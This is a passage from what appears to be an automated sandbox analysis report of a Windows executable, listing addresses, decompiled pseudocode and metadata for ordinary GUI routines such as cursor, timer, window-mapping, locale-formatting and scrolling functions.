0x004436b3
0x004436b8
0x0044394b
0x0044394e
0x00443952
0x00000000
0x00000000
0x00443969
0x0044396b
0x0044396f
0x00443981
0x00443983
0x00000000
0x00000000
0x0044398c
0x0044398c
0x0044398f
0x0044399a
0x0044399f
0x004439ae
0x004439b8
0x004439c3
0x004439d3
0x004439e3
0x004439eb
0x004439f9
0x00443a07
0x00443a08
0x00443a09
0x00443a0a
0x00000000
0x00443a0a
0x00443991
0x00443994
0x00000000
0x00000000
0x00000000
0x00443994
0x00443977
0x00000000
0x004436be
0x004436be
0x004436c1
0x004436c7
0x004436ca
0x004436d0
0x004436df
0x004436df
0x004436d0
0x00000000
0x004436c1
0x004436b8
0x0044368a
0x0044382e
0x00443832
0x00443892
0x00443834
0x0044383a
0x0044384d
0x0044384f
0x00443851
0x00443857
0x0044385b
0x00443861
0x00443866
0x0044386c
0x00443871
0x00443873
0x00443885
0x00443875
0x00443877
0x00443877
0x00443873
0x0044385b
0x00443851
0x00000000
0x00443832
0x00443690
0x00443693
0x004438a0
0x004438b1
0x004438b9
0x004438bf
0x004438c2
0x004438c7
0x00000000
0x00000000
0x004438d8
0x004438db
0x00000000
0x00000000
0x004438ec
0x004438ee
0x00000000
0x00000000
0x00443902
0x00443904
0x00443906
0x00000000
0x00000000
0x0044390c
0x00443910
0x00000000
0x00000000
0x00443925
0x00443932
0x00443937
0x00000000
0x00443937
0x00443699
0x0044369e
0x004436e9
0x004436ec
0x004436f0
0x004436f9
0x00443704
0x00443709
0x0044370f
0x00443715
0x00443719
0x00443722
0x00443722
0x00000000
0x004436f0
0x004436a1
0x00443781
0x00443786
0x00443794
0x00443796
0x00443798
0x00000000
0x00000000
0x0044379e
0x004437a2
0x004437b6
0x004437ba
0x00000000
0x00000000
0x004437dc
0x004437e1
0x004437e3
0x004437e8
0x004437ee
0x004437f3
0x004437f5
0x004437fc
0x004437fc
0x004437f5
0x00443802
0x00443805
0x0044380c
0x00443812
0x00443816
0x00443821
0x00443821
0x00443816
0x00000000
0x0044380c
0x004437ac
0x00000000
0x004436a7

APIs

GetCursorPos.USER32(?), ref: 004438A0
SetCursor.USER32(00000000,?,00000000,00443A38), ref: 00443932

Strings

`NC, xrefs: 004437E8

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor
String ID: `NC
API String ID: 3268636600-918118547
Opcode ID: f7c74d81f964bc4f20ea5fec5752d74ed2e32656671d70a9f91e691ce9aa7558
Instruction ID: 1d7f5713cc2549e45e58fe85bb2fa03b13f2b2d90be15fa78b56c3320b109250
Opcode Fuzzy Hash: f7c74d81f964bc4f20ea5fec5752d74ed2e32656671d70a9f91e691ce9aa7558
Instruction Fuzzy Hash: 5AC18B31A00209CFEB10DF69C9859AEB7F1BF04B05F1485AAE841AB395D778EF45CB49

Uniqueness

Uniqueness Score: -1.00%

Function 004624A0, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 276
timeCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004624A0(intOrPtr* __eax, signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				signed int _v9;
				signed int _v16;
				signed int _v20;
				char _v21;
				char _v124;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t145;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr _t193;
				signed int _t197;
				signed int _t204;
				intOrPtr _t213;
				intOrPtr _t215;
				signed int _t224;
				signed int _t237;
				signed int _t240;
				void* _t248;
				void* _t252;
				signed int _t253;
				intOrPtr _t268;
				intOrPtr _t284;
				void* _t295;
				signed int _t297;
				intOrPtr _t304;

				_v9 = __ecx;
				_t253 = __edx;
				_v8 = __eax;
				_t294 = _a8;
				_v21 = 0;
				E00463354(_v8, __edx, _a8, _t295);
				_t145 = _v8;
				_t305 =  *(_t145 + 0x1c) & 0x00000010;
				if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
					L5:
					__eflags = _t253;
					if(_t253 != 0) {
						L8:
						__eflags = _t253;
						if(_t253 != 0) {
							L37:
							_push(0x46284b);
							_push( *[fs:eax]);
							 *[fs:eax] = _t304;
							E0043A2BC(_v8, _t253, _a4, _t294);
							_pop(_t268);
							 *[fs:eax] = _t268;
							return 0;
						}
						E0045FDC8(_v8,  &_v124);
						_t296 =  *_v8;
						 *((intOrPtr*)( *_v8 + 0xc8))( &_v124, _v8 + 0x268, _v8 + 0x264, _v8 + 0x260, _v8 + 0x28e);
						__eflags =  *((char*)(_v8 + 0x28e));
						if(__eflags != 0) {
							__eflags =  *((char*)(_v8 + 0x28e)) - 3;
							if(__eflags == 0) {
								_t296 = 0xffc8;
								_t237 = E004037B0(_v8, __eflags);
								__eflags = _t237;
								if(_t237 != 0) {
									_t240 = E004386C0(_v8) -  *(_v8 + 0x264);
									__eflags = _t240;
									 *(_v8 + 0x264) = _t240;
								}
							}
							return E004607BC(_v8, _t253,  &_v124, _t294, _t296);
						}
						_t259 = _a4;
						E0045FD6C(_v8, _a4, _t294, __eflags,  &_v20,  &_v124);
						_t169 = _v8;
						_t297 = _v20;
						__eflags =  *((intOrPtr*)(_t169 + 0x238)) - _t297;
						if( *((intOrPtr*)(_t169 + 0x238)) > _t297) {
							L25:
							_t171 = _v8;
							__eflags =  *(_t171 + 0x249) & 0x00000001;
							if(( *(_t171 + 0x249) & 0x00000001) == 0) {
								L31:
								_t172 = _v8;
								__eflags =  *(_t172 + 0x249) & 0x00000002;
								if(( *(_t172 + 0x249) & 0x00000002) != 0) {
									__eflags = _v16;
									if(_v16 >= 0) {
										_t173 = _v8;
										__eflags =  *((intOrPtr*)(_t173 + 0x23c)) - _v16;
										if( *((intOrPtr*)(_t173 + 0x23c)) > _v16) {
											__eflags =  *((intOrPtr*)(_v8 + 0x238)) - _v20;
											if(__eflags <= 0) {
												_t177 = _v20;
												 *((intOrPtr*)(_v8 + 0x26c)) = _t177;
												 *((intOrPtr*)(_v8 + 0x270)) = _t177;
												E00412A88(_t294,  &_v132, _a4);
												_push( &_v132);
												_t184 = E004037B0(_v8, __eflags);
												__eflags = _t184;
												if(_t184 != 0) {
													 *((char*)(_v8 + 0x28e)) = 5;
													 *((intOrPtr*)( *_v8 + 0x88))();
													E004608FC(_v8, _t253, _t294, 0xffa3);
													_v21 = 1;
													SetTimer(E0043F370(_v8), 1, 0x3c, 0);
												}
											}
										}
									}
								}
								goto L37;
							}
							__eflags = _v20;
							if(_v20 < 0) {
								goto L31;
							}
							_t193 = _v8;
							__eflags =  *((intOrPtr*)(_t193 + 0x238)) - _v20;
							if( *((intOrPtr*)(_t193 + 0x238)) <= _v20) {
								goto L31;
							}
							__eflags =  *((intOrPtr*)(_v8 + 0x23c)) - _v16;
							if(__eflags > 0) {
								goto L31;
							}
							_t197 = _v16;
							 *((intOrPtr*)(_v8 + 0x26c)) = _t197;
							 *((intOrPtr*)(_v8 + 0x270)) = _t197;
							E00412A88(_t294,  &_v132, _a4);
							_push( &_v132);
							_t204 = E004037B0(_v8, __eflags);
							__eflags = _t204;
							if(_t204 != 0) {
								 *((char*)(_v8 + 0x28e)) = 4;
								 *((intOrPtr*)( *_v8 + 0x88))();
								E004608FC(_v8, _t253, _t294, 0xffa2);
								_v21 = 1;
								SetTimer(E0043F370(_v8), 1, 0x3c, 0);
							}
							goto L37;
						}
						_t213 = _v8;
						__eflags =  *((intOrPtr*)(_t213 + 0x23c)) - _v16;
						if( *((intOrPtr*)(_t213 + 0x23c)) > _v16) {
							goto L25;
						}
						_t215 = _v8;
						__eflags =  *(_t215 + 0x249) & 0x00000004;
						if(( *(_t215 + 0x249) & 0x00000004) == 0) {
							 *((char*)(_v8 + 0x28e)) = 1;
							SetTimer(E0043F370(_v8), 1, 0x3c, 0);
							__eflags = _v9 & 0x00000001;
							if((_v9 & 0x00000001) == 0) {
								E00461434(_v8, _t253, _v16, _t297, _t294, _t297, 1, 1);
							} else {
								E004613AC(_v8, _t259,  &_v20, _t294);
							}
							goto L37;
						}
						_t284 = _v8;
						_t224 = _v20;
						__eflags =  *((intOrPtr*)(_t284 + 0x228)) - _t224;
						if( *((intOrPtr*)(_t284 + 0x228)) != _t224) {
							L20:
							E00461434(_v8, _t253, _v16, _t224, _t294, _t297, 1, 1);
							E00463430(_v8, _t294, _t297);
							L21:
							E004037B0(_v8, __eflags);
							goto L37;
						}
						__eflags =  *((intOrPtr*)(_v8 + 0x22c)) - _v16;
						if(__eflags != 0) {
							goto L20;
						}
						E0045ED14(_v8);
						goto L21;
					}
					__eflags = _v9 & 0x00000040;
					if(__eflags == 0) {
						goto L8;
					} else {
						E004037B0(_v8, __eflags);
						goto L37;
					}
				}
				if(E004037B0(_v8, _t305) != 0) {
					L3:
					 *((intOrPtr*)( *_v8 + 0xc0))();
					_t248 = E0045EC84(_v8, _t307);
					_t308 = _t248;
					if(_t248 == 0) {
						return E00438EF4(_v8, 0, _t308);
					}
					goto L5;
				}
				_t252 = E004500B0(_v8);
				_t307 = _t252;
				if(_t252 != 0) {
					goto L5;
				}
				goto L3;
			}

0x004624a9
0x004624ac
0x004624ae
0x004624b1
0x004624b4
0x004624bb
0x004624c0
0x004624c3
0x004624c7
0x0046250b
0x0046250b
0x0046250d
0x00462526
0x00462526
0x00462528
0x00462821
0x00462824
0x00462829
0x0046282c
0x0046283c
0x00462843
0x00462846
0x00000000
0x00462846
0x00462534
0x00462569
0x0046256b
0x00462574
0x0046257b
0x00462580
0x00462587
0x0046258c
0x00462590
0x00462595
0x00462597
0x004625a4
0x004625a4
0x004625ad
0x004625ad
0x00462597
0x00000000
0x004625b9
0x004625cb
0x004625d3
0x004625d8
0x004625e1
0x004625e4
0x004625e6
0x004626a6
0x004626a6
0x004626a9
0x004626b0
0x0046276a
0x0046276a
0x0046276d
0x00462774
0x0046277a
0x0046277e
0x00462784
0x0046278d
0x00462790
0x0046279f
0x004627a2
0x004627a7
0x004627aa
0x004627b3
0x004627c1
0x004627c9
0x004627e3
0x004627e8
0x004627ea
0x004627ef
0x004627fb
0x00462804
0x00462809
0x0046281c
0x0046281c
0x004627ea
0x004627a2
0x00462790
0x0046277e
0x00000000
0x00462774
0x004626b6
0x004626ba
0x00000000
0x00000000
0x004626c0
0x004626c9
0x004626cc
0x00000000
0x00000000
0x004626db
0x004626de
0x00000000
0x00000000
0x004626e7
0x004626ea
0x004626f3
0x00462701
0x00462709
0x00462723
0x00462728
0x0046272a
0x00462733
0x0046273f
0x00462748
0x0046274d
0x00462760
0x00462760
0x00000000
0x0046272a
0x004625ec
0x004625f5
0x004625f8
0x00000000
0x00000000
0x004625fe
0x00462601
0x00462608
0x0046265f
0x00462675
0x0046267a
0x0046267e
0x0046269c
0x00462680
0x00462686
0x00462686
0x00000000
0x0046267e
0x0046260a
0x00462613
0x00462616
0x00462618
0x00462632
0x0046263e
0x00462646
0x0046264b
0x00462652
0x00000000
0x00462652
0x00462623
0x00462626
0x00000000
0x00000000
0x0046262b
0x00000000
0x0046262b
0x0046250f
0x00462513
0x00000000
0x00462515
0x0046251c
0x00000000
0x0046251c
0x00462513
0x004624d7
0x004624e5
0x004624ea
0x004624f3
0x004624f8
0x004624fa
0x00000000
0x00462501
0x00000000
0x004624fa
0x004624dc
0x004624e1
0x004624e3
0x00000000
0x00000000
0x00000000

APIs

SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 00462675
SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 00462760
SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0046281C

Strings

@, xrefs: 0046250F

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Timer
String ID: @
API String ID: 2870079774-2766056989
Opcode ID: e19c6d066cb0ebf89f24c24055dd5b0b2d63a3d2a4710d8bab3af7d36b94b696
Instruction ID: b04af2dd0f035db5d223fb8d5fb95ff9779478ab5d06ee46ebc96045597ce5c2
Opcode Fuzzy Hash: e19c6d066cb0ebf89f24c24055dd5b0b2d63a3d2a4710d8bab3af7d36b94b696
Instruction Fuzzy Hash: 76C12D34A00608EFDB10DB99CA85BDEB7F5BF04304F2441A6E804A7392D779AF45DB45

Uniqueness

Uniqueness Score: -1.00%

Function 004399F0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E004399F0(void* __eax, intOrPtr __ecx, intOrPtr __edx, char _a4) {
				intOrPtr _v8;
				char _v9;
				intOrPtr _v16;
				struct tagPOINT _v32;
				intOrPtr _v36;
				long _v40;
				char _v56;
				void* __edi;
				struct HWND__* _t57;
				void* _t63;
				char _t84;
				struct HWND__* _t108;
				void* _t110;
				intOrPtr _t134;
				intOrPtr _t137;
				void* _t141;
				struct HWND__* _t143;
				struct HWND__* _t147;
				void* _t152;
				void* _t154;
				intOrPtr _t155;

				_t152 = _t154;
				_t155 = _t154 + 0xffffffcc;
				_v8 = __ecx;
				_t137 = __edx;
				_t110 = __eax;
				if(__edx == 0 || __edx == 0xffffffff) {
					_t57 =  *(_t110 + 0xa0);
					if(_t57 == 0 ||  *((char*)(_t57 + 0x1a7)) == 0 ||  *((intOrPtr*)(_t57 + 0x17c)) == 0) {
						E00412A88( *((intOrPtr*)(_t110 + 0x40)),  &_v40,  *((intOrPtr*)(_t110 + 0x44)));
						_v32.x = _v40;
						_v32.y = _v36;
						_t143 =  *(_t110 + 0x30);
						__eflags = _t143;
						if(_t143 != 0) {
							E004387D4(_t143,  &_v40,  &_v32);
							_v32.x = _v40;
							_v32.y = _v36;
						}
					} else {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x17c)))) + 0x14))();
						MapWindowPoints(E0043F370( *(_t110 + 0xa0)), 0,  &_v32, 2);
					}
					_t63 = E00438C4C(_t110);
					E00412AD8(_v32.x, E00438C60(_t110), _v32.y,  &_v56, _t63);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v9 = E00439BD0(_t110,  &_v32);
					goto L20;
				} else {
					E00439ED8(__eax);
					__eflags =  *(_t110 + 0xa0);
					if(__eflags == 0) {
						L12:
						_t84 = 1;
					} else {
						_t108 = E004037B0( *(_t110 + 0xa0), __eflags);
						__eflags = _t108;
						if(_t108 != 0) {
							goto L12;
						} else {
							_t84 = 0;
						}
					}
					_v9 = _t84;
					__eflags = _v9;
					if(_v9 == 0) {
						L20:
						return _v9;
					} else {
						_v16 = E004363E8(1, _t137);
						_push(_t152);
						_push(0x439bbb);
						_push( *[fs:edx]);
						 *[fs:edx] = _t155;
						_t87 =  *(_t110 + 0xa0);
						__eflags =  *(_t110 + 0xa0);
						if( *(_t110 + 0xa0) == 0) {
							_t147 = 0;
							__eflags = 0;
						} else {
							_t147 = E0043F370(_t87);
						}
						E0043865C(_t110,  &_v32);
						__eflags = _t147;
						if(__eflags != 0) {
							MapWindowPoints(_t147, 0,  &_v32, 2);
						}
						 *((intOrPtr*)(_v16 + 4)) = _t137;
						 *((char*)(_v16 + 0x54)) = _a4;
						 *((intOrPtr*)(_v16 + 0x58)) = _v8;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t141 = _t137;
						MapWindowPoints(0, E0043F370(_t141),  &_v32, 1);
						_push(_v32.y);
						E004037B0(_t141, __eflags);
						__eflags = 0;
						_pop(_t134);
						 *[fs:eax] = _t134;
						_push(0x439bc2);
						return E004035B4(_v16);
					}
				}
			}

0x004399f1
0x004399f3
0x004399f9
0x004399fc
0x004399fe
0x00439a02
0x00439a0d
0x00439a15
0x00439a5d
0x00439a65
0x00439a6b
0x00439a6e
0x00439a71
0x00439a73
0x00439a7d
0x00439a85
0x00439a8b
0x00439a8b
0x00439a29
0x00439a36
0x00439a4d
0x00439a4d
0x00439a90
0x00439aa9
0x00439ab4
0x00439ab5
0x00439ab6
0x00439ab7
0x00439ac2
0x00000000
0x00439aca
0x00439acc
0x00439ad1
0x00439ad8
0x00439af5
0x00439af5
0x00439ada
0x00439ae8
0x00439aed
0x00439aef
0x00000000
0x00439af1
0x00439af1
0x00439af1
0x00439aef
0x00439af7
0x00439afa
0x00439afe
0x00439bc2
0x00439bcb
0x00439b04
0x00439b12
0x00439b17
0x00439b18
0x00439b1d
0x00439b20
0x00439b23
0x00439b29
0x00439b2b
0x00439b36
0x00439b36
0x00439b2d
0x00439b32
0x00439b32
0x00439b3d
0x00439b42
0x00439b44
0x00439b4f
0x00439b4f
0x00439b57
0x00439b60
0x00439b69
0x00439b76
0x00439b77
0x00439b78
0x00439b79
0x00439b7a
0x00439b8b
0x00439b93
0x00439ba0
0x00439ba5
0x00439ba7
0x00439baa
0x00439bad
0x00439bba
0x00439bba
0x00439afe

APIs

MapWindowPoints.USER32 ref: 00439A4D
MapWindowPoints.USER32 ref: 00439B4F
MapWindowPoints.USER32 ref: 00439B8B

Strings

<<C, xrefs: 00439B08

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: PointsWindow
String ID: <<C
API String ID: 4123100037-1310108723
Opcode ID: 0d24ce9bbe9451f139d5006053f2b3907b376103ea18818fd4cd6e1287589c2f
Instruction ID: d3f814b52d3f3b5c362c96177e8c950607e642efbd92538d2f2fe142554e6a2e
Opcode Fuzzy Hash: 0d24ce9bbe9451f139d5006053f2b3907b376103ea18818fd4cd6e1287589c2f
Instruction Fuzzy Hash: A8517075E002499FCB00DF69C881AEEF7F5AF49300F14916AEC14AB391C7B8AD09CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00409C78, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00409C78(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x409e42);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00404320(__edx);
				E00409940(GetThreadLocale(), 0x409e58, 0x1009,  &_v12);
				if(E00408740(0x409e58, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E004045D8(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x4710c0], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00408CB8(_t124 + _t92 - 1, 2, 0x409e5c);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00408CB8(_t124 + _t92 - 1, 4, 0x409e6c);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00408CB8(_t124 + _t92 - 1, 2, 0x409e84);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E004045E0(_t122, 0x409e9c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404500();
												E004045E0(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E004045E0(_t122, 0x409e90);
										_t92 = _t92 + 1;
									}
								} else {
									E004045E0(_t122, 0x409e7c);
									_t92 = _t92 + 3;
								}
							} else {
								E004045E0(_t122, 0x409e68);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040A9C0(_t124, _t92);
							E00404830(_t124, _v8, _t92,  &_v20);
							E004045E0(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x48f7f4; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00404374(_t122, _t124);
					} else {
						while(_t92 <= E004045D8(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404500();
									E004045E0(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E00409E49);
				return E00404344( &_v24, 4);
			}

0x00409c78
0x00409c7d
0x00409c7e
0x00409c7f
0x00409c80
0x00409c81
0x00409c85
0x00409c87
0x00409c8b
0x00409c8c
0x00409c91
0x00409c94
0x00409c97
0x00409c9e
0x00409cb6
0x00409cce
0x00409e18
0x00409e1a
0x00409e1f
0x00409e21
0x00000000
0x00000000
0x00409d37
0x00409d3c
0x00409d43
0x00409d81
0x00409d86
0x00409d88
0x00409da7
0x00409dac
0x00409dae
0x00409dcf
0x00409dd4
0x00409dd6
0x00409deb
0x00409deb
0x00409ded
0x00409df3
0x00409dfa
0x00409def
0x00409def
0x00409df1
0x00409e08
0x00409e12
0x00000000
0x00000000
0x00000000
0x00409df1
0x00409dd8
0x00409ddf
0x00409de4
0x00409de4
0x00409db0
0x00409db7
0x00409dbc
0x00409dbc
0x00409d8a
0x00409d91
0x00409d96
0x00409d96
0x00409e17
0x00409e17
0x00409d45
0x00409d4e
0x00409d5c
0x00409d66
0x00409d6b
0x00409d6b
0x00409d43
0x00409cd4
0x00409cd4
0x00409cd9
0x00409cdc
0x00409cea
0x00409ce6
0x00409ce6
0x00409ce6
0x00409cee
0x00409d29
0x00409cf0
0x00409d15
0x00409cf6
0x00409cf6
0x00409cf8
0x00409cfa
0x00409cfc
0x00409d05
0x00409d0f
0x00409d0f
0x00409cfc
0x00409d14
0x00409d14
0x00409d14
0x00409d20
0x00409cee
0x00409e27
0x00409e29
0x00409e2c
0x00409e2f
0x00409e41

APIs

GetThreadLocale.KERNEL32(?,00000000,00409E42,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409CA7

Part of subcall function 00409940: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040995E

Strings

ggg, xrefs: 00409D8C
yyyy, xrefs: 00409D99
eeee, xrefs: 00409DB2

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: e740448f7b23abf1e202922b0e8a28a7b5816c4c0106e9600074a1662399f449
Instruction ID: b1cc0a42b2b977963f09e3c4df03bea2d22e2a3ff2346005cc6a014a45f458e2
Opcode Fuzzy Hash: e740448f7b23abf1e202922b0e8a28a7b5816c4c0106e9600074a1662399f449
Instruction Fuzzy Hash: 5341E5797041055BD715EA66D8816BFB295DFC4308B60443BE681B37C7EB3C9D0282AE

Uniqueness

Uniqueness Score: -1.00%

Function 0043EF68, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043EF68(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
				char _t23;
				struct HWND__* _t42;
				void* _t43;
				intOrPtr _t47;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				 *((intOrPtr*)(_t59 + 4)) = __ecx;
				 *_t59 = __edx;
				_t54 = __eax;
				_t42 =  *(__eax + 0x180);
				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
					_t23 = 0;
				} else {
					_t23 = 1;
				}
				 *((char*)(_t59 + 8)) = _t23;
				if( *((char*)(_t59 + 8)) != 0) {
					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
				}
				_t56 = E0043C1F8(_t54) - 1;
				if(_t56 < 0) {
					L14:
					return E0043BD88();
				} else {
					_t57 = _t56 + 1;
					_t58 = 0;
					do {
						_t43 = E0043C1BC(_t54, _t58);
						_t47 =  *0x434e14; // 0x434e60
						if(E00403740(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
						} else {
							if( *((char*)(_t59 + 8)) == 0) {
								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
							}
						}
						_t58 = _t58 + 1;
						_t57 = _t57 - 1;
					} while (_t57 != 0);
					goto L14;
				}
			}

0x0043ef6f
0x0043ef73
0x0043ef76
0x0043ef78
0x0043ef80
0x0043ef8c
0x0043ef90
0x0043ef90
0x0043ef90
0x0043ef92
0x0043ef9b
0x0043efb2
0x0043efb2
0x0043efc0
0x0043efc3
0x0043f031
0x0043f03f
0x0043efc5
0x0043efc5
0x0043efc6
0x0043efc8
0x0043efd1
0x0043efd5
0x0043efe2
0x0043eff0
0x0043eff7
0x0043effc
0x0043f001
0x0043f028
0x0043f028
0x0043f001
0x0043f02d
0x0043f02e
0x0043f02e
0x00000000
0x0043efc8

APIs

IsWindowVisible.USER32(?), ref: 0043EF83
ScrollWindow.USER32 ref: 0043EFB2
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0043F028

Strings

`NC, xrefs: 0043EFD5

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ScrollVisible
String ID: `NC
API String ID: 4127837035-918118547
Opcode ID: 470d5b4f620aea773379c3c5e608396b2e8a9281d87429e663caf6d465da83a5
Instruction ID: 74fcff1920f98a81aa1ba1a1336476b2713305271cd95b240de63e703cda033f
Opcode Fuzzy Hash: 470d5b4f620aea773379c3c5e608396b2e8a9281d87429e663caf6d465da83a5
Instruction Fuzzy Hash: B5219F71605200BFC710DA5EC880B6BB7E4AF8C714F14956EF658CB392D779EC05876A

Uniqueness

Uniqueness Score: -1.00%

Function 00424C48, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00424C48(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

